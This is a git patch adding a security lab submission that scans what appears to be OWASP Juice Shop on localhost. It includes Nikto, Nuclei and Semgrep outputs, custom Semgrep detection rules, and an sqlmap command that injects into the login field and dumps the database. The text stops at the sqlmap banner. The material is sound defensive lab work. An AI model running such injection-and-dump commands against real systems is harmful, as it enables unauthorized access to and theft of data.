From f49df30ded3abe906cbd3a5e248449f82d75c743 Mon Sep 17 00:00:00 2001 From: InnoNodo Date: Fri, 8 May 2026 12:11:33 +0300 Subject: [PATCH] docs: add lab5 SAST and DAST submission --- labs/lab5/analysis/correlation.txt | 8 + labs/lab5/analysis/sast-analysis.txt | 3 + labs/lab5/nikto/nikto-results.txt | 85 + labs/lab5/nuclei/nuclei-results.json | 1 + labs/lab5/semgrep/custom-rules.yml | 44 + labs/lab5/semgrep/semgrep-results.json | 1 + labs/lab5/sqlmap/localhost/target.txt | 3 + labs/lab5/sqlmap/login-scan.log | 2713 ++++++++ labs/lab5/sqlmap/results-05082026_1141am.csv | 2 + labs/lab5/sqlmap/results-05082026_1148am.csv | 2 + labs/lab5/sqlmap/search-scan.log | 53 + .../zap/admin-application-configuration.json | 1 + labs/lab5/zap/auth-check.txt | 2 + labs/lab5/zap/report-auth.html | 4092 ++++++++++++ labs/lab5/zap/report-noauth.html | 5489 +++++++++++++++++ labs/lab5/zap/zap-auth-run.log | 114 + labs/lab5/zap/zap-report-auth.json | 1179 ++++ labs/lab5/zap/zap-report-noauth.json | 1609 +++++ labs/submission5.md | 130 + 19 files changed, 15531 insertions(+) create mode 100644 labs/lab5/analysis/correlation.txt create mode 100644 labs/lab5/analysis/sast-analysis.txt create mode 100644 labs/lab5/nikto/nikto-results.txt create mode 100644 labs/lab5/nuclei/nuclei-results.json create mode 100644 labs/lab5/semgrep/custom-rules.yml create mode 100644 labs/lab5/semgrep/semgrep-results.json create mode 100644 labs/lab5/sqlmap/localhost/target.txt create mode 100644 labs/lab5/sqlmap/login-scan.log create mode 100644 labs/lab5/sqlmap/results-05082026_1141am.csv create mode 100644 labs/lab5/sqlmap/results-05082026_1148am.csv create mode 100644 labs/lab5/sqlmap/search-scan.log create mode 100644 labs/lab5/zap/admin-application-configuration.json create mode 100644 labs/lab5/zap/auth-check.txt create mode 100644 labs/lab5/zap/report-auth.html create mode 100644 labs/lab5/zap/report-noauth.html create mode 100644 labs/lab5/zap/zap-auth-run.log create mode 100644 labs/lab5/zap/zap-report-auth.json create mode 100644 labs/lab5/zap/zap-report-noauth.json create mode 100644 labs/submission5.md diff --git a/labs/lab5/analysis/correlation.txt b/labs/lab5/analysis/correlation.txt new file mode 100644 index 00000000..be2b63d4 --- /dev/null +++ b/labs/lab5/analysis/correlation.txt @@ -0,0 +1,8 @@ +SAST/DAST Correlation Report +Semgrep findings: 8 +ZAP noauth alert rules: 13 +ZAP auth alert rules: 11 +Nuclei matches: 1 +Nikto items: 84 +SQLmap confirmed injection points: 2 +Key correlation: Semgrep SQL injection in routes/search.ts was confirmed by SQLmap against /rest/products/search. diff --git a/labs/lab5/analysis/sast-analysis.txt b/labs/lab5/analysis/sast-analysis.txt new file mode 100644 index 00000000..087b3c64 --- /dev/null +++ b/labs/lab5/analysis/sast-analysis.txt @@ -0,0 +1,3 @@ +SAST Analysis Report +Semgrep findings: 8 +Critical patterns: SQL injection, eval, MD5, open redirect diff --git a/labs/lab5/nikto/nikto-results.txt b/labs/lab5/nikto/nikto-results.txt new file mode 100644 index 00000000..7a92692b --- /dev/null +++ b/labs/lab5/nikto/nikto-results.txt @@ -0,0 +1,85 @@ +- Nikto v2.5.0/ ++ Target Host: localhost ++ Target Port: 3000 ++ GET /: Retrieved access-control-allow-origin header: *. ++ GET /:X-Frame-Options header is deprecated and was replaced with the Content-Security-Policy HTTP header with the frame-ancestors directive instead. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options: ++ GET /: Uncommon header(s) 'x-recruiting' found, with contents: /#/jobs. ++ GET /robots.txt: Entry '/ftp/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file: ++ GET /robots.txt: contains 1 entry which should be manually viewed. See: https://developer.mozilla.org/en-US/docs/Glossary/Robots.txt: ++ HEAD /archive.tar.bz2: Potentially interesting backup/cert file found. . See: https://cwe.mitre.org/data/definitions/530.html: ++ HEAD /archive.cer: Potentially interesting backup/cert file found. . See: https://cwe.mitre.org/data/definitions/530.html: ++ HEAD /localhost.tar: Potentially interesting backup/cert file found. . See: https://cwe.mitre.org/data/definitions/530.html: ++ HEAD /site.pem: Potentially interesting backup/cert file found. . See: https://cwe.mitre.org/data/definitions/530.html: ++ HEAD /backup.pem: Potentially interesting backup/cert file found. . See: https://cwe.mitre.org/data/definitions/530.html: ++ HEAD /archive.tar.lzma: Potentially interesting backup/cert file found. . See: https://cwe.mitre.org/data/definitions/530.html: ++ HEAD /backup.alz: Potentially interesting backup/cert file found. . See: https://cwe.mitre.org/data/definitions/530.html: ++ HEAD /site.alz: Potentially interesting backup/cert file found. . See: https://cwe.mitre.org/data/definitions/530.html: ++ HEAD /backup.egg: Potentially interesting backup/cert file found. . See: https://cwe.mitre.org/data/definitions/530.html: ++ HEAD /localhost.cer: Potentially interesting backup/cert file found. . See: https://cwe.mitre.org/data/definitions/530.html: ++ HEAD /dump.egg: Potentially interesting backup/cert file found. . See: https://cwe.mitre.org/data/definitions/530.html: ++ HEAD /dump.jks: Potentially interesting backup/cert file found. . See: https://cwe.mitre.org/data/definitions/530.html: ++ HEAD /database.tar.lzma: Potentially interesting backup/cert file found. . See: https://cwe.mitre.org/data/definitions/530.html: ++ HEAD /localhost.pem: Potentially interesting backup/cert file found. . See: https://cwe.mitre.org/data/definitions/530.html: ++ HEAD /archive.jks: Potentially interesting backup/cert file found. . See: https://cwe.mitre.org/data/definitions/530.html: ++ HEAD /database.alz: Potentially interesting backup/cert file found. . See: https://cwe.mitre.org/data/definitions/530.html: ++ HEAD /backup.tar: Potentially interesting backup/cert file found. . See: https://cwe.mitre.org/data/definitions/530.html: ++ HEAD /127.0.0.1.tgz: Potentially interesting backup/cert file found. . See: https://cwe.mitre.org/data/definitions/530.html: ++ HEAD /127.0.0.1.tar.bz2: Potentially interesting backup/cert file found. . See: https://cwe.mitre.org/data/definitions/530.html: ++ HEAD /dump.pem: Potentially interesting backup/cert file found. . See: https://cwe.mitre.org/data/definitions/530.html: ++ HEAD /127.0.0.1.alz: Potentially interesting backup/cert file found. . See: https://cwe.mitre.org/data/definitions/530.html: ++ HEAD /127.0.0.1.egg: Potentially interesting backup/cert file found. . See: https://cwe.mitre.org/data/definitions/530.html: ++ HEAD /backup.tar.lzma: Potentially interesting backup/cert file found. . See: https://cwe.mitre.org/data/definitions/530.html: ++ HEAD /backup.tar.bz2: Potentially interesting backup/cert file found. . See: https://cwe.mitre.org/data/definitions/530.html: ++ HEAD /dump.alz: Potentially interesting backup/cert file found. . See: https://cwe.mitre.org/data/definitions/530.html: ++ HEAD /127.0.0.1.tar.lzma: Potentially interesting backup/cert file found. . See: https://cwe.mitre.org/data/definitions/530.html: ++ HEAD /localhost.war: Potentially interesting backup/cert file found. . See: https://cwe.mitre.org/data/definitions/530.html: ++ HEAD /site.egg: Potentially interesting backup/cert file found. . See: https://cwe.mitre.org/data/definitions/530.html: ++ HEAD /database.war: Potentially interesting backup/cert file found. . See: https://cwe.mitre.org/data/definitions/530.html: ++ HEAD /database.pem: Potentially interesting backup/cert file found. . See: https://cwe.mitre.org/data/definitions/530.html: ++ HEAD /site.jks: Potentially interesting backup/cert file found. . See: https://cwe.mitre.org/data/definitions/530.html: ++ HEAD /archive.tgz: Potentially interesting backup/cert file found. . See: https://cwe.mitre.org/data/definitions/530.html: ++ HEAD /127.0.0.1.jks: Potentially interesting backup/cert file found. . See: https://cwe.mitre.org/data/definitions/530.html: ++ HEAD /archive.egg: Potentially interesting backup/cert file found. . See: https://cwe.mitre.org/data/definitions/530.html: ++ HEAD /dump.tar.bz2: Potentially interesting backup/cert file found. . See: https://cwe.mitre.org/data/definitions/530.html: ++ HEAD /localhost.egg: Potentially interesting backup/cert file found. . See: https://cwe.mitre.org/data/definitions/530.html: ++ HEAD /database.tar: Potentially interesting backup/cert file found. . See: https://cwe.mitre.org/data/definitions/530.html: ++ HEAD /localhost.tar.bz2: Potentially interesting backup/cert file found. . See: https://cwe.mitre.org/data/definitions/530.html: ++ HEAD /localhost.tgz: Potentially interesting backup/cert file found. . See: https://cwe.mitre.org/data/definitions/530.html: ++ HEAD /localhost.alz: Potentially interesting backup/cert file found. . See: https://cwe.mitre.org/data/definitions/530.html: ++ HEAD /database.tgz: Potentially interesting backup/cert file found. . See: https://cwe.mitre.org/data/definitions/530.html: ++ HEAD /127.0.0.1.war: Potentially interesting backup/cert file found. . See: https://cwe.mitre.org/data/definitions/530.html: ++ HEAD /dump.war: Potentially interesting backup/cert file found. . See: https://cwe.mitre.org/data/definitions/530.html: ++ HEAD /site.tar: Potentially interesting backup/cert file found. . See: https://cwe.mitre.org/data/definitions/530.html: ++ HEAD /localhost.tar.lzma: Potentially interesting backup/cert file found. . See: https://cwe.mitre.org/data/definitions/530.html: ++ HEAD /backup.tgz: Potentially interesting backup/cert file found. . See: https://cwe.mitre.org/data/definitions/530.html: ++ HEAD /dump.cer: Potentially interesting backup/cert file found. . See: https://cwe.mitre.org/data/definitions/530.html: ++ HEAD /dump.tgz: Potentially interesting backup/cert file found. . See: https://cwe.mitre.org/data/definitions/530.html: ++ HEAD /site.tar.lzma: Potentially interesting backup/cert file found. . See: https://cwe.mitre.org/data/definitions/530.html: ++ HEAD /localhost.jks: Potentially interesting backup/cert file found. . See: https://cwe.mitre.org/data/definitions/530.html: ++ HEAD /backup.jks: Potentially interesting backup/cert file found. . See: https://cwe.mitre.org/data/definitions/530.html: ++ HEAD /database.jks: Potentially interesting backup/cert file found. . See: https://cwe.mitre.org/data/definitions/530.html: ++ HEAD /backup.cer: Potentially interesting backup/cert file found. . See: https://cwe.mitre.org/data/definitions/530.html: ++ HEAD /database.egg: Potentially interesting backup/cert file found. . See: https://cwe.mitre.org/data/definitions/530.html: ++ HEAD /archive.war: Potentially interesting backup/cert file found. . See: https://cwe.mitre.org/data/definitions/530.html: ++ HEAD /archive.alz: Potentially interesting backup/cert file found. . See: https://cwe.mitre.org/data/definitions/530.html: ++ HEAD /site.tar.bz2: Potentially interesting backup/cert file found. . See: https://cwe.mitre.org/data/definitions/530.html: ++ HEAD /127.0.0.1.tar: Potentially interesting backup/cert file found. . See: https://cwe.mitre.org/data/definitions/530.html: ++ HEAD /database.cer: Potentially interesting backup/cert file found. . See: https://cwe.mitre.org/data/definitions/530.html: ++ HEAD /127.0.0.1.cer: Potentially interesting backup/cert file found. . See: https://cwe.mitre.org/data/definitions/530.html: ++ HEAD /site.war: Potentially interesting backup/cert file found. . See: https://cwe.mitre.org/data/definitions/530.html: ++ HEAD /database.tar.bz2: Potentially interesting backup/cert file found. . See: https://cwe.mitre.org/data/definitions/530.html: ++ HEAD /dump.tar: Potentially interesting backup/cert file found. . See: https://cwe.mitre.org/data/definitions/530.html: ++ HEAD /archive.tar: Potentially interesting backup/cert file found. . See: https://cwe.mitre.org/data/definitions/530.html: ++ HEAD /site.cer: Potentially interesting backup/cert file found. . See: https://cwe.mitre.org/data/definitions/530.html: ++ HEAD /backup.war: Potentially interesting backup/cert file found. . See: https://cwe.mitre.org/data/definitions/530.html: ++ HEAD /127.0.0.1.pem: Potentially interesting backup/cert file found. . See: https://cwe.mitre.org/data/definitions/530.html: ++ HEAD /archive.pem: Potentially interesting backup/cert file found. . See: https://cwe.mitre.org/data/definitions/530.html: ++ HEAD /dump.tar.lzma: Potentially interesting backup/cert file found. . See: https://cwe.mitre.org/data/definitions/530.html: ++ HEAD /site.tgz: Potentially interesting backup/cert file found. . See: https://cwe.mitre.org/data/definitions/530.html: ++ GET /: Suggested security header missing: strict-transport-security. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Strict-Transport-Security: ++ GET /: Suggested security header missing: referrer-policy. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Referrer-Policy: ++ GET /: Suggested security header missing: permissions-policy. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Permissions-Policy: ++ GET /: Suggested security header missing: content-security-policy. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP: ++ GET /ftp/: This might be interesting. ++ GET /public/: This might be interesting. ++ GET /.htpasswd: Contains authorization information. diff --git a/labs/lab5/nuclei/nuclei-results.json b/labs/lab5/nuclei/nuclei-results.json new file mode 100644 index 00000000..8223216b --- /dev/null +++ b/labs/lab5/nuclei/nuclei-results.json @@ -0,0 +1 @@ +{"template":"http/exposures/apis/swagger-api.yaml","template-url":"https://cloud.projectdiscovery.io/public/swagger-api","template-id":"swagger-api","template-path":"/root/nuclei-templates/http/exposures/apis/swagger-api.yaml","info":{"name":"Public Swagger API - Detect","author":["pdteam","c-sh0","amirhossein raeisi","eduardo quintanilha"],"tags":["exposure","api","swagger","discovery"],"description":"Public Swagger API was detected.\n","reference":["https://swagger.io/"],"severity":"info","metadata":{"verified":true,"max-request":59,"shodan-query":"http.title:\"swagger\""},"classification":{"cve-id":null,"cwe-id":["cwe-200"],"cvss-metrics":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N"}},"type":"http","host":"localhost","port":"3000","scheme":"http","url":"http://localhost:3000","matched-at":"http://localhost:3000/api-docs/swagger.yaml","request":"GET /api-docs/swagger.yaml HTTP/1.1\r\nHost: localhost:3000\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.0\r\nAccept: text/html, application/json\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n","response":"HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nAccess-Control-Allow-Origin: *\r\nContent-Type: text/html; charset=utf-8\r\nDate: Mon, 13 Apr 2026 08:52:15 GMT\r\nEtag: W/\"c22-H8FH9nKD8DeX/nvIRrte6ZjP2a4\"\r\nFeature-Policy: payment 'self'\r\nVary: Accept-Encoding\r\nX-Content-Type-Options: nosniff\r\nX-Frame-Options: SAMEORIGIN\r\nX-Recruiting: /#/jobs\r\n\r\n\n\u003c!-- HTML for static distribution bundle build --\u003e\n\u003c!DOCTYPE html\u003e\n\u003chtml lang=\"en\"\u003e\n\u003chead\u003e\n \u003cmeta charset=\"UTF-8\"\u003e\n \n \u003ctitle\u003eSwagger UI\u003c/title\u003e\n \u003clink rel=\"stylesheet\" type=\"text/css\" href=\"./swagger-ui.css\" \u003e\n \u003clink rel=\"icon\" type=\"image/png\" href=\"./favicon-32x32.png\" sizes=\"32x32\" /\u003e\u003clink rel=\"icon\" type=\"image/png\" href=\"./favicon-16x16.png\" sizes=\"16x16\" /\u003e\n \u003cstyle\u003e\n html\n {\n box-sizing: border-box;\n overflow: -moz-scrollbars-vertical;\n overflow-y: scroll;\n }\n *,\n *:before,\n *:after\n {\n box-sizing: inherit;\n }\n\n body {\n margin:0;\n background: #fafafa;\n }\n \u003c/style\u003e\n\u003c/head\u003e\n\n\u003cbody\u003e\n\n\u003csvg xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" style=\"position:absolute;width:0;height:0\"\u003e\n \u003cdefs\u003e\n \u003csymbol viewBox=\"0 0 20 20\" id=\"unlocked\"\u003e\n \u003cpath d=\"M15.8 8H14V5.6C14 2.703 12.665 1 10 1 7.334 1 6 2.703 6 5.6V6h2v-.801C8 3.754 8.797 3 10 3c1.203 0 2 .754 2 2.199V8H4c-.553 0-1 .646-1 1.199V17c0 .549.428 1.139.951 1.307l1.197.387C5.672 18.861 6.55 19 7.1 19h5.8c.549 0 1.428-.139 1.951-.307l1.196-.387c.524-.167.953-.757.953-1.306V9.199C17 8.646 16.352 8 15.8 8z\"\u003e\u003c/path\u003e\n \u003c/symbol\u003e\n\n \u003csymbol viewBox=\"0 0 20 20\" id=\"locked\"\u003e\n \u003cpath d=\"M15.8 8H14V5.6C14 2.703 12.665 1 10 1 7.334 1 6 2.703 6 5.6V8H4c-.553 0-1 .646-1 1.199V17c0 .549.428 1.139.951 1.307l1.197.387C5.672 18.861 6.55 19 7.1 19h5.8c.549 0 1.428-.139 1.951-.307l1.196-.387c.524-.167.953-.757.953-1.306V9.199C17 8.646 16.352 8 15.8 8zM12 8H8V5.199C8 3.754 8.797 3 10 3c1.203 0 2 .754 2 2.199V8z\"/\u003e\n \u003c/symbol\u003e\n\n \u003csymbol viewBox=\"0 0 20 20\" id=\"close\"\u003e\n \u003cpath d=\"M14.348 14.849c-.469.469-1.229.469-1.697 0L10 11.819l-2.651 3.029c-.469.469-1.229.469-1.697 0-.469-.469-.469-1.229 0-1.697l2.758-3.15-2.759-3.152c-.469-.469-.469-1.228 0-1.697.469-.469 1.228-.469 1.697 0L10 8.183l2.651-3.031c.469-.469 1.228-.469 1.697 0 .469.469.469 1.229 0 1.697l-2.758 3.152 2.758 3.15c.469.469.469 1.229 0 1.698z\"/\u003e\n \u003c/symbol\u003e\n\n \u003csymbol viewBox=\"0 0 20 20\" id=\"large-arrow\"\u003e\n \u003cpath d=\"M13.25 10L6.109 2.58c-.268-.27-.268-.707 0-.979.268-.27.701-.27.969 0l7.83 7.908c.268.271.268.709 0 .979l-7.83 7.908c-.268.271-.701.27-.969 0-.268-.269-.268-.707 0-.979L13.25 10z\"/\u003e\n \u003c/symbol\u003e\n\n \u003csymbol viewBox=\"0 0 20 20\" id=\"large-arrow-down\"\u003e\n \u003cpath d=\"M17.418 6.109c.272-.268.709-.268.979 0s.271.701 0 .969l-7.908 7.83c-.27.268-.707.268-.979 0l-7.908-7.83c-.27-.268-.27-.701 0-.969.271-.268.709-.268.979 0L10 13.25l7.418-7.141z\"/\u003e\n \u003c/symbol\u003e\n\n\n \u003csymbol viewBox=\"0 0 24 24\" id=\"jump-to\"\u003e\n \u003cpath d=\"M19 7v4H5.83l3.58-3.59L8 6l-6 6 6 6 1.41-1.41L5.83 13H21V7z\"/\u003e\n \u003c/symbol\u003e\n\n \u003csymbol viewBox=\"0 0 24 24\" id=\"expand\"\u003e\n \u003cpath d=\"M10 18h4v-2h-4v2zM3 6v2h18V6H3zm3 7h12v-2H6v2z\"/\u003e\n \u003c/symbol\u003e\n\n \u003c/defs\u003e\n\u003c/svg\u003e\n\n\u003cdiv id=\"swagger-ui\"\u003e\u003c/div\u003e\n\n\u003cscript src=\"./swagger-ui-bundle.js\"\u003e \u003c/script\u003e\n\u003cscript src=\"./swagger-ui-standalone-preset.js\"\u003e \u003c/script\u003e\n\u003cscript src=\"./swagger-ui-init.js\"\u003e \u003c/script\u003e\n\n\n\n\u003cstyle\u003e\n .swagger-ui .topbar .download-url-wrapper { display: none } undefined\n\u003c/style\u003e\n\u003c/body\u003e\n\n\u003c/html\u003e\n","meta":{"paths":"/api-docs/swagger.yaml"},"ip":"127.0.0.1","timestamp":"2026-04-13T08:52:15.140536908Z","curl-command":"curl -X 'GET' -d '' -H 'Accept: text/html, application/json' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.0' 'http://localhost:3000/api-docs/swagger.yaml'","matcher-status":true} diff --git a/labs/lab5/semgrep/custom-rules.yml b/labs/lab5/semgrep/custom-rules.yml new file mode 100644 index 00000000..a2c2223e --- /dev/null +++ b/labs/lab5/semgrep/custom-rules.yml @@ -0,0 +1,44 @@ +rules: + - id: juice-shop-md5-hash + languages: [typescript, javascript] + severity: WARNING + message: Insecure MD5 hashing detected. + metadata: + category: security + cwe: "CWE-327: Use of a Broken or Risky Cryptographic Algorithm" + confidence: MEDIUM + pattern: crypto.createHash('md5') + + - id: juice-shop-sql-string-interpolation + languages: [typescript, javascript] + severity: ERROR + message: Raw SQL query built from string interpolation can enable SQL injection. + metadata: + category: security + cwe: "CWE-89: Improper Neutralization of Special Elements used in an SQL Command" + confidence: HIGH + patterns: + - pattern: $DB.query(`...${...}...`) + - metavariable-regex: + metavariable: $DB + regex: .*(sequelize|Sequelize).* + + - id: juice-shop-eval + languages: [typescript, javascript] + severity: ERROR + message: Use of eval on dynamic input is dangerous. + metadata: + category: security + cwe: "CWE-95: Improper Neutralization of Directives in Dynamically Evaluated Code" + confidence: HIGH + pattern: eval(...) + + - id: juice-shop-open-redirect + languages: [typescript, javascript] + severity: WARNING + message: Redirecting to a user-controlled URL can enable open redirect attacks. + metadata: + category: security + cwe: "CWE-601: URL Redirection to Untrusted Site" + confidence: MEDIUM + pattern: res.redirect($URL) diff --git a/labs/lab5/semgrep/semgrep-results.json b/labs/lab5/semgrep/semgrep-results.json new file mode 100644 index 00000000..de4193f5 --- /dev/null +++ b/labs/lab5/semgrep/semgrep-results.json @@ -0,0 +1 @@ +{"version":"1.157.0","results":[{"check_id":"output.juice-shop-md5-hash","path":"/src/lib/insecurity.ts","start":{"line":43,"col":39,"offset":2252},"end":{"line":43,"col":63,"offset":2276},"extra":{"message":"Insecure MD5 hashing detected.","metadata":{"category":"security","cwe":"CWE-327: Use of a Broken or Risky Cryptographic Algorithm","confidence":"MEDIUM"},"severity":"WARNING","fingerprint":"requires login","lines":"requires login","validation_state":"NO_VALIDATOR","engine_kind":"OSS"}},{"check_id":"output.juice-shop-eval","path":"/src/routes/captcha.ts","start":{"line":23,"col":20,"offset":919},"end":{"line":23,"col":36,"offset":935},"extra":{"message":"Use of eval on dynamic input is dangerous.","metadata":{"category":"security","cwe":"CWE-95: Improper Neutralization of Directives in Dynamically Evaluated Code","confidence":"HIGH"},"severity":"ERROR","fingerprint":"requires login","lines":"requires login","validation_state":"NO_VALIDATOR","engine_kind":"OSS"}},{"check_id":"output.juice-shop-open-redirect","path":"/src/routes/profileImageFileUpload.ts","start":{"line":57,"col":5,"offset":2005},"end":{"line":57,"col":53,"offset":2053},"extra":{"message":"Redirecting to a user-controlled URL can enable open redirect attacks.","metadata":{"category":"security","cwe":"CWE-601: URL Redirection to Untrusted Site","confidence":"MEDIUM"},"severity":"WARNING","fingerprint":"requires login","lines":"requires login","validation_state":"NO_VALIDATOR","engine_kind":"OSS"}},{"check_id":"output.juice-shop-open-redirect","path":"/src/routes/profileImageUrlUpload.ts","start":{"line":48,"col":5,"offset":2291},"end":{"line":48,"col":53,"offset":2339},"extra":{"message":"Redirecting to a user-controlled URL can enable open redirect attacks.","metadata":{"category":"security","cwe":"CWE-601: URL Redirection to Untrusted Site","confidence":"MEDIUM"},"severity":"WARNING","fingerprint":"requires login","lines":"requires login","validation_state":"NO_VALIDATOR","engine_kind":"OSS"}},{"check_id":"output.juice-shop-open-redirect","path":"/src/routes/redirect.ts","start":{"line":19,"col":7,"offset":1032},"end":{"line":19,"col":26,"offset":1051},"extra":{"message":"Redirecting to a user-controlled URL can enable open redirect attacks.","metadata":{"category":"security","cwe":"CWE-601: URL Redirection to Untrusted Site","confidence":"MEDIUM"},"severity":"WARNING","fingerprint":"requires login","lines":"requires login","validation_state":"NO_VALIDATOR","engine_kind":"OSS"}},{"check_id":"output.juice-shop-sql-string-interpolation","path":"/src/routes/search.ts","start":{"line":23,"col":5,"offset":824},"end":{"line":23,"col":161,"offset":980},"extra":{"message":"Raw SQL query built from string interpolation can enable SQL injection.","metadata":{"category":"security","cwe":"CWE-89: Improper Neutralization of Special Elements used in an SQL Command","confidence":"HIGH"},"severity":"ERROR","fingerprint":"requires login","lines":"requires login","validation_state":"NO_VALIDATOR","engine_kind":"OSS"}},{"check_id":"output.juice-shop-open-redirect","path":"/src/routes/updateUserProfile.ts","start":{"line":42,"col":7,"offset":1544},"end":{"line":42,"col":55,"offset":1592},"extra":{"message":"Redirecting to a user-controlled URL can enable open redirect attacks.","metadata":{"category":"security","cwe":"CWE-601: URL Redirection to Untrusted Site","confidence":"MEDIUM"},"severity":"WARNING","fingerprint":"requires login","lines":"requires login","validation_state":"NO_VALIDATOR","engine_kind":"OSS"}},{"check_id":"output.juice-shop-eval","path":"/src/routes/userProfile.ts","start":{"line":62,"col":20,"offset":1855},"end":{"line":62,"col":30,"offset":1865},"extra":{"message":"Use of eval on dynamic input is dangerous.","metadata":{"category":"security","cwe":"CWE-95: Improper Neutralization of Directives in Dynamically Evaluated Code","confidence":"HIGH"},"severity":"ERROR","fingerprint":"requires login","lines":"requires login","validation_state":"NO_VALIDATOR","engine_kind":"OSS"}}],"errors":[],"paths":{"scanned":["/src/lib/accuracy.ts","/src/lib/antiCheat.ts","/src/lib/botUtils.ts","/src/lib/challengeUtils.ts","/src/lib/codingChallenges.ts","/src/lib/config.types.ts","/src/lib/insecurity.ts","/src/lib/is-docker.ts","/src/lib/is-heroku.ts","/src/lib/is-windows.ts","/src/lib/logger.ts","/src/lib/noUpdate.ts","/src/lib/startup/cleanupFtpFolder.ts","/src/lib/startup/customizeApplication.ts","/src/lib/startup/customizeEasterEgg.ts","/src/lib/startup/registerWebsocketEvents.ts","/src/lib/startup/restoreOverwrittenFilesWithOriginals.ts","/src/lib/startup/validateChatBot.ts","/src/lib/startup/validateConfig.ts","/src/lib/startup/validateDependencies.ts","/src/lib/startup/validateDependenciesBasic.ts","/src/lib/startup/validatePreconditions.ts","/src/lib/utils.ts","/src/lib/webhook.ts","/src/models/address.ts","/src/models/basket.ts","/src/models/basketitem.ts","/src/models/captcha.ts","/src/models/card.ts","/src/models/challenge.ts","/src/models/complaint.ts","/src/models/delivery.ts","/src/models/feedback.ts","/src/models/hint.ts","/src/models/imageCaptcha.ts","/src/models/index.ts","/src/models/memory.ts","/src/models/privacyRequests.ts","/src/models/product.ts","/src/models/quantity.ts","/src/models/recycle.ts","/src/models/relations.ts","/src/models/securityAnswer.ts","/src/models/securityQuestion.ts","/src/models/user.ts","/src/models/wallet.ts","/src/routes/2fa.ts","/src/routes/address.ts","/src/routes/angular.ts","/src/routes/appConfiguration.ts","/src/routes/appVersion.ts","/src/routes/authenticatedUsers.ts","/src/routes/b2bOrder.ts","/src/routes/basket.ts","/src/routes/basketItems.ts","/src/routes/captcha.ts","/src/routes/changePassword.ts","/src/routes/chatbot.ts","/src/routes/checkKeys.ts","/src/routes/continueCode.ts","/src/routes/countryMapping.ts","/src/routes/coupon.ts","/src/routes/createProductReviews.ts","/src/routes/currentUser.ts","/src/routes/dataErasure.ts","/src/routes/dataExport.ts","/src/routes/delivery.ts","/src/routes/deluxe.ts","/src/routes/easterEgg.ts","/src/routes/errorHandler.ts","/src/routes/fileServer.ts","/src/routes/fileUpload.ts","/src/routes/imageCaptcha.ts","/src/routes/keyServer.ts","/src/routes/languages.ts","/src/routes/likeProductReviews.ts","/src/routes/logfileServer.ts","/src/routes/login.ts","/src/routes/memory.ts","/src/routes/metrics.ts","/src/routes/nftMint.ts","/src/routes/order.ts","/src/routes/orderHistory.ts","/src/routes/payment.ts","/src/routes/premiumReward.ts","/src/routes/privacyPolicyProof.ts","/src/routes/profileImageFileUpload.ts","/src/routes/profileImageUrlUpload.ts","/src/routes/quarantineServer.ts","/src/routes/recycles.ts","/src/routes/redirect.ts","/src/routes/repeatNotification.ts","/src/routes/resetPassword.ts","/src/routes/restoreProgress.ts","/src/routes/saveLoginIp.ts","/src/routes/search.ts","/src/routes/securityQuestion.ts","/src/routes/showProductReviews.ts","/src/routes/trackOrder.ts","/src/routes/updateProductReviews.ts","/src/routes/updateUserProfile.ts","/src/routes/userProfile.ts","/src/routes/verify.ts","/src/routes/videoHandler.ts","/src/routes/vulnCodeFixes.ts","/src/routes/vulnCodeSnippet.ts","/src/routes/wallet.ts","/src/routes/web3Wallet.ts"]},"time":{"rules":[],"rules_parse_time":0.007879018783569336,"profiling_times":{"config_time":0.4380671977996826,"core_time":0.9077045917510986,"ignores_time":6.556510925292969e-05,"total_time":1.3618957996368408},"parsing_time":{"total_time":0.0,"per_file_time":{"mean":0.0,"std_dev":0.0},"very_slow_stats":{"time_ratio":0.0,"count_ratio":0.0},"very_slow_files":[]},"scanning_time":{"total_time":1.3830232620239258,"per_file_time":{"mean":0.012805770944665971,"std_dev":0.0005515989866564419},"very_slow_stats":{"time_ratio":0.0,"count_ratio":0.0},"very_slow_files":[]},"matching_time":{"total_time":0.0,"per_file_and_rule_time":{"mean":0.0,"std_dev":0.0},"very_slow_stats":{"time_ratio":0.0,"count_ratio":0.0},"very_slow_rules_on_files":[]},"tainting_time":{"total_time":0.0,"per_def_and_rule_time":{"mean":0.0,"std_dev":0.0},"very_slow_stats":{"time_ratio":0.0,"count_ratio":0.0},"very_slow_rules_on_defs":[]},"fixpoint_timeouts":[],"prefiltering":{"project_level_time":0.0,"file_level_time":0.0,"rules_with_project_prefilters_ratio":0.0,"rules_with_file_prefilters_ratio":1.0,"rules_selected_ratio":0.07175925925925926,"rules_matched_ratio":0.07175925925925926},"targets":[],"total_bytes":0,"max_memory_bytes":262834816},"engine_requested":"OSS","skipped_rules":[],"profiling_results":[]} \ No newline at end of file diff --git a/labs/lab5/sqlmap/localhost/target.txt b/labs/lab5/sqlmap/localhost/target.txt new file mode 100644 index 00000000..bf1057b9 --- /dev/null +++ b/labs/lab5/sqlmap/localhost/target.txt @@ -0,0 +1,3 @@ +http://localhost:3000/rest/user/login (POST) # /usr/bin/sqlmap -u http://localhost:3000/rest/user/login --data {\"email\":\"*\",\"password\":\"test\"} --method POST "--headers=Content-Type: application/json" --dbms=sqlite --batch --ignore-code=401 --level=5 --risk=3 --technique=BT --threads=5 --output-dir=labs/lab5/sqlmap --dump + +{"email":"*","password":"test"} \ No newline at end of file diff --git a/labs/lab5/sqlmap/login-scan.log b/labs/lab5/sqlmap/login-scan.log new file mode 100644 index 00000000..03d34240 --- /dev/null +++ b/labs/lab5/sqlmap/login-scan.log @@ -0,0 +1,2713 @@ + ___ + __H__ + ___ ___[)]_____ ___ ___ {1.8.4#stable} +|_ -| . [.] | .'| . | +|___|_ [,]_|_|_|__,| _| + |_|V... |_| https://sqlmap.org 